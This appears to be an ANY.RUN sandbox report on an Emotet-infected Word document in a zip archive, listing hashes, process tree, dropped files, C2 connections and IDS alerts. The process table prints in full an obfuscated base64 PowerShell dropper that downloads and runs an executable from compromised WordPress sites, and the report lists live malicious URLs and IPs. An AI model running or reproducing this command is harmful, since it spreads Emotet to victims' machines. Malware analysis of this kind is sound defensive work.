File name: | 5272035555311616.zip |
Full analysis: | https://app.any.run/tasks/11c14f98-b89b-4698-991e-fec66d60e650 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 20, 2020, 08:07:42 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 4CC19B1B6199A8CD874F97D4269539FF |
SHA1: | 2BC2CA8C2D2D210312341197A9B1D342011E3671 |
SHA256: | 3A1AEB45B8FE755739975F179F9AB20A1C0E2340CAB7D3D72F9A988E410348EF |
SSDEEP: | 1536:VpRT+cHe1nTwEqc+9Ikuvuw8KmU7s18WVauNgb2/2JVA31qgN3glzP0HdP:VpRT+cH+qF8h218WVauMikgqlr0N |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0009 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:00:00 00:00:00 |
ZipCRC: | 0x7700204d |
ZipCompressedSize: | 89282 |
ZipUncompressedSize: | 181491 |
ZipFileName: | 4b4223e6a6dc418e3a195ce4497e54059303e105c63ccf8277d7263ee0bea456 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3068 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\5272035555311616.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3160 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\Rar$DIb3068.11311\4b4223e6a6dc418e3a195ce4497e54059303e105c63ccf8277d7263ee0bea456 | C:\Windows\system32\rundll32.exe | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3296 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb3068.11311\4b4223e6a6dc418e3a195ce4497e54059303e105c63ccf8277d7263ee0bea456" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | rundll32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2492 | POwersheLL -ENCOD JABBAGgAbAB5AHUAcABvAD0AKAAoACcAWQAnACsAJwBpADkAagAnACkAKwAnAGwAeQAnACsAJwBoACcAKQA7ACQAVgAxAGIAbwBpAGMAOQA9ACQAUwBhAGoAaQB4AHQAOAAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQAgACsAIAAyADAAIAArACAAMQAwACAAKwAgADEAMAApACAAKwAgACQARAB5AGwANQA5ADcAZgA7ACQAQQB3AG4AYgAzAGoAZwA9ACgAKAAnAFcANQAnACsAJwBnACcAKQArACgAJwAxADEAZAAnACsAJwBvACcAKQApADsAWwBzAHkAcwB0AGUAbQAuAGkAbwAuAGQAaQByAGUAYwB0AG8AcgB5AF0AOgA6ACIAYwBSAEUAYABBAHQARQBkAEkAYABSAEUAYABjAHQATwBSAHkAIgAoACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAIAArACAAKAAoACgAJwBKAEkAJwArACcAbwBYACcAKQArACgAJwBrADIAZQAwACcAKwAnAHkAJwArACcAbgBKAEkAbwAnACkAKwAnAEUAbAAnACsAKAAnAGwAZQBpACcAKwAnAG8AJwApACsAKAAnAHoASgBJACcAKwAnAG8AJwApACkAIAAtAGMAcgBFAFAATABhAEMAZQAgACAAKAAnAEoAJwArACcASQBvACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAEQAagBwAGgAZgBxADUAPQAoACgAJwBIAHMAJwArACcAdAAnACkAKwAoACcAOABkACcAKwAnAHYAJwApACsAJwAwACcAKQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBVAFIASQBUAFkAYABwAHIAYABPAGAAVABvAEMAbwBMACIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6ACIAdABMAFMAYAAxADIAIgA7ACQAQwB0AGoAegBsAGYAawA9ACgAJwBXACcAKwAnADIAbgAnACsAKAAnADQAJwArACcAbQBoAGQAJwApACkAOwAkAE0AcwBtAHMAZQBqAGEAIAA9ACAAKAAoACcARwA1ACcAKwAnAHoAeQAnACkAKwAnAHEAMAAnACkAOwAkAE8ANAA2ADIAawAyAGoAPQAoACgAJwBIACcAKwAnADcAZQAnACkAKwAnAHgAJwArACgAJwBoACcAKwAnADYAegAnACkAKQA7ACQAWgBfAF8AbQBwAGQAYQA9ACgAJwBDAHAAJwArACgAJwByAHgAawAnACsAJwA4ACcAKQArACcAawAnACkAOwAkAEMAeAAzAGYAcwBuAHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwACcAKwAnAH0AWABrADIAZQAwAHkAbgAnACsAJwB7ACcAKwAnADAAJwArACcAfQBFAGwAbABlAGkAbwB6AHsAMAB9ACcAKQAgACAALQBmAFsAQwBIAEEAcgBdADkAMgApACsAJABNAHMAbQBzAGUAagBhACsAKAAnAC4AJwArACgAJwBlACcAKwAnAHgAZQAnACkAKQA7ACQARABqAHoAOABxAHAAYQA9ACgAJwBQAG4AJwArACgAJwBjACcAKwAnADkAaQB1ADcAJwApACkAOwAkAEIAagAyAHAAMwBfAHUAPQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AdwBlAEIAQwBsAGkARQBuAFQAOwAkAFYAeQBjADMAZwA4ADkAPQAoACcAaAAnACsAKAAnAHQAdABwADoALwAvAHYAdQBhACcAKwAnAHQAJwArACcAcgBpAHQAJwApACsAKAAnAHUAZQAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACcALwAnACsAJwB3ACcAKwAoACcAcAAtACcAKwAnAGEAJwApACsAKAAnAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AVQB4ACcAKwAnAC8AKgBoAHQAJwArACcAdABwADoAJwApACsAJwAvACcAKwAoACcALwBzACcAKwAnAGgAJwArACcAcgBhAGQAZAAnACsAJwBoAGEAYwBhAHIAJwApACsAJwByAGUAJwArACcAbgAnACsAKAAnAHQAYQBsACcAKwAnAGkAJwArACcAbgBkACcAKQArACgAJwBvACcAKwAnAHIAZQAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAoACcALwB3ACcAKwAnAHAALQBpAG4AYwBsAHUAJwArACcAZAAnACkAKwAoACcAZQBzAC8ATQAnACsAJwAvACoAaAAnACsAJwB0AHQAJwApACsAKAAnAHAAOgAnACsAJwAvACcAKQArACcALwB3ACcAKwAnAHcAdwAnACsAKAAnAC4AZgBvAHIAJwArACcAdAAnACsAJwB1AG4AJwApACsAJwBlACcAKwAoACcAbABhACcAKwAnAGIAZQAnACkAKwAoACcAbABzACcAKwAnAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AdABlACcAKwAnAHMAdAAvACcAKwAnAFMAWgAvACcAKwAnACoAJwArACcAaAB0AHQAcAAnACkAKwAoACcAOgAvAC8AJwArACcAcAA0ACcAKQArACgAJwB1AGMAbABhACcAKwAnAHMAJwArACcAcwBlACcAKQArACgAJwBzACcAKwAnAC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AdwBwAC0AYwAnACsAJwBvACcAKQArACgAJwBuAHQAZQAnACsAJwBuACcAKQArACgAJwB0AC8ARwAvACcAKwAnACoAJwApACsAKAAnAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvACcAKQArACcALwB0ACcAKwAnAGEAbgAnACsAKAAnAGcAJwArACcAZQByACcAKQArACcALQAnACsAKAAnAHMAbwAnACsAJwBmAHQALgBjAG8AJwApACsAJwBtACcAKwAoACcALwBkAG8AZQAnACsAJwBzACcAKQArACgAJwAtAGwAZQBhAHYAaQBuACcAKwAnAGcALwAnACsAJwBLAGkAJwApACsAKAAnAGcALwAnACsAJwAqAGgAJwApACsAKAAnAHQAdABwACcAKwAnAHMAJwApACsAKAAnADoALwAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHcAdwAnACsAJwAuAHAAeABpAGQAMwA2ACcAKwAnADAAJwArACcALgBjAG8AbQAvACcAKQArACgAJwB3AHAALQAnACsAJwBhACcAKQArACgAJwBkACcAKwAnAG0AaQAnACkAKwAnAG4ALwAnACsAKAAnAFAAJwArACcATgAnACsAJwAvACoAaAB0AHQAJwArACcAcAA6ACcAKQArACcALwAnACsAKAAnAC8AJwArACcAYwBoAGkAbAAnACkAKwAnAGQAJwArACgAJwBzACcAKwAnAGUAbAAnACkAKwAoACcAZQAnACsAJwBjAHQALgAnACsAJwBjAG8AJwApACsAKAAnAG0ALwBjACcAKwAnAGcAaQAtAGIAaQAnACsAJwBuACcAKwAnAC8AeQAvACcAKQApAC4AIgBTAFAATABgAGkAVAAiACgAJABQAHcAMQB6AHIAdwA2ACAAKwAgACQAVgAxAGIAbwBpAGMAOQAgACsAIAAkAFUAegB4ADcAawB3AGUAKQA7ACQAUABzAHMAMABmADMAMgA9ACgAJwBaACcAKwAoACcAawAnACsAJwAzAGIAYgBjACcAKQArACcAMAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEUAOQB3ADMAMABtAGMAIABpAG4AIAAkAFYAeQBjADMAZwA4ADkAKQB7AHQAcgB5AHsAJABCAGoAMgBwADMAXwB1AC4AIgBkAE8AdwBOAEwAbwBhAGQAYABGAEkAYABsAGUAIgAoACQARQA5AHcAMwAwAG0AYwAsACAAJABDAHgAMwBmAHMAbgB4ACkAOwAkAE4AagBjAHkAZwB3AGYAPQAoACcASwAnACsAJwBpACcAKwAoACcAZgAnACsAJwAzADMAZgBwACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEMAeAAzAGYAcwBuAHgAKQAuACIATABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADQAMAA0ADgAMgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAJwArACcAaQAnACsAKAAnAG4AMwAnACsAJwAyAF8AUAByACcAKwAnAG8AJwApACsAKAAnAGMAZQAnACsAJwBzAHMAJwApACkAKQAuACIAQwBSAGAAZQBhAHQARQAiACgAJABDAHgAMwBmAHMAbgB4ACkAOwAkAFIAbgAxAGMAOQBjADUAPQAoACcARQB6ACcAKwAnAGgANQAnACsAKAAnADQAJwArACcAcAB6ACcAKQApADsAYgByAGUAYQBrADsAJABDAG0AYQB1AHEAaQBfAD0AKAAnAFoAdQAnACsAKAAnADgAeAAnACsAJwAwADQANgAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQA0AG4AMQBpAHMAdwA9ACgAJwBHACcAKwAnADQAYQAnACsAKAAnADgAOQB6ACcAKwAnAHYAJwApACkA | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2140 | C:\Users\admin\Xk2e0yn\Elleioz\G5zyq0.exe | C:\Users\admin\Xk2e0yn\Elleioz\G5zyq0.exe | wmiprvse.exe | |
User: admin Company: Steffen Lange Integrity Level: MEDIUM Description: Password Changer Exit code: 0 Version: 1.0.0.1 | ||||
2120 | "C:\Users\admin\AppData\Local\sensrsvc\api-ms-win-downlevel-ole32-l1-1-0.exe" | C:\Users\admin\AppData\Local\sensrsvc\api-ms-win-downlevel-ole32-l1-1-0.exe | G5zyq0.exe | |
User: admin Company: Steffen Lange Integrity Level: MEDIUM Description: Password Changer Version: 1.0.0.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR90EA.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2492 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y19ZMFSVGMGKIFEXI1C4.temp | — | |
MD5:— | SHA256:— | |||
2492 | POwersheLL.exe | C:\Users\admin\Xk2e0yn\Elleioz\G5zyq0.exe | — | |
MD5:— | SHA256:— | |||
3068 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb3068.11311\4b4223e6a6dc418e3a195ce4497e54059303e105c63ccf8277d7263ee0bea456 | document | |
MD5:16486F6E4489E66AEABFDDA186CEB933 | SHA256:4B4223E6A6DC418E3A195CE4497E54059303E105C63CCF8277D7263EE0BEA456 | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:A657988AD2F69C097ECA6B26967CBD09 | SHA256:A8B2564EA0A878BF61E7A1775C1A74C35E082D24A1592D0A572D5DCA696DFD37 | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:98A5E20635E1819BFEDFF2BBC383B625 | SHA256:2B8BC60ADC2742DF9A20759D29E8CEA6147395423C0111D79BB46A4ECD7C7821 | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb3068.11311\~$4223e6a6dc418e3a195ce4497e54059303e105c63ccf8277d7263ee0bea456 | pgc | |
MD5:DF2B1B511853D90B6EB07C3FE40FE565 | SHA256:CFBC28E8D46606D0A11E20E857D7538157E49553912116B1219B2AE62F385E5E | |||
2492 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169d10.TMP | binary | |
MD5:B8D28A0751A092388652CF6B1F64DABE | SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 | |||
2492 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:B8D28A0751A092388652CF6B1F64DABE | SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 | |||
2140 | G5zyq0.exe | C:\Users\admin\AppData\Local\sensrsvc\api-ms-win-downlevel-ole32-l1-1-0.exe | executable | |
MD5:38D91FF870D4D2D5E7B03680C8B35B78 | SHA256:0E6344CB0FCEB7C4BF2F49EDDAB0CDE2A64F399829CC05D96192FCDD50A089EE |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2492 | POwersheLL.exe | GET | 200 | 45.124.87.188:80 | http://vuatritue.com/wp-admin/Ux/ | VN | executable | 361 Kb | malicious |
2120 | api-ms-win-downlevel-ole32-l1-1-0.exe | POST | — | 98.103.204.12:443 | http://98.103.204.12:443/txDUx9FFNHq979PWDu/NeMwWazy7kaAecIWCN/690Yy4STvC5V/ | US | — | — | malicious |
2120 | api-ms-win-downlevel-ole32-l1-1-0.exe | POST | 307 | 2.45.176.233:80 | http://2.45.176.233/cq1BWHxpk/d6TocUIL5g1UN/G9uh6JWOYFvMJ6D/M6TZcy/ | IT | — | — | malicious |
2120 | api-ms-win-downlevel-ole32-l1-1-0.exe | POST | 200 | 172.86.186.21:8080 | http://172.86.186.21:8080/ALtz9002wMj/9TGYnTYUX/MHcAXwUKqfH/SjWFqz9DPbZG0SxjMS4/ | CA | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2120 | api-ms-win-downlevel-ole32-l1-1-0.exe | 98.103.204.12:443 | — | Time Warner Cable Internet LLC | US | malicious |
2120 | api-ms-win-downlevel-ole32-l1-1-0.exe | 2.45.176.233:80 | — | Vodafone Italia S.p.A. | IT | malicious |
2492 | POwersheLL.exe | 45.124.87.188:80 | vuatritue.com | VNPT Corp | VN | suspicious |
2120 | api-ms-win-downlevel-ole32-l1-1-0.exe | 172.86.186.21:8080 | — | Amanah Tech Inc. | CA | malicious |
Domain | IP | Reputation |
---|---|---|
vuatritue.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2492 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2492 | POwersheLL.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2492 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2492 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2120 | api-ms-win-downlevel-ole32-l1-1-0.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 16 |
2120 | api-ms-win-downlevel-ole32-l1-1-0.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |
2120 | api-ms-win-downlevel-ole32-l1-1-0.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 25 |
2120 | api-ms-win-downlevel-ole32-l1-1-0.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
2120 | api-ms-win-downlevel-ole32-l1-1-0.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |
2120 | api-ms-win-downlevel-ole32-l1-1-0.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |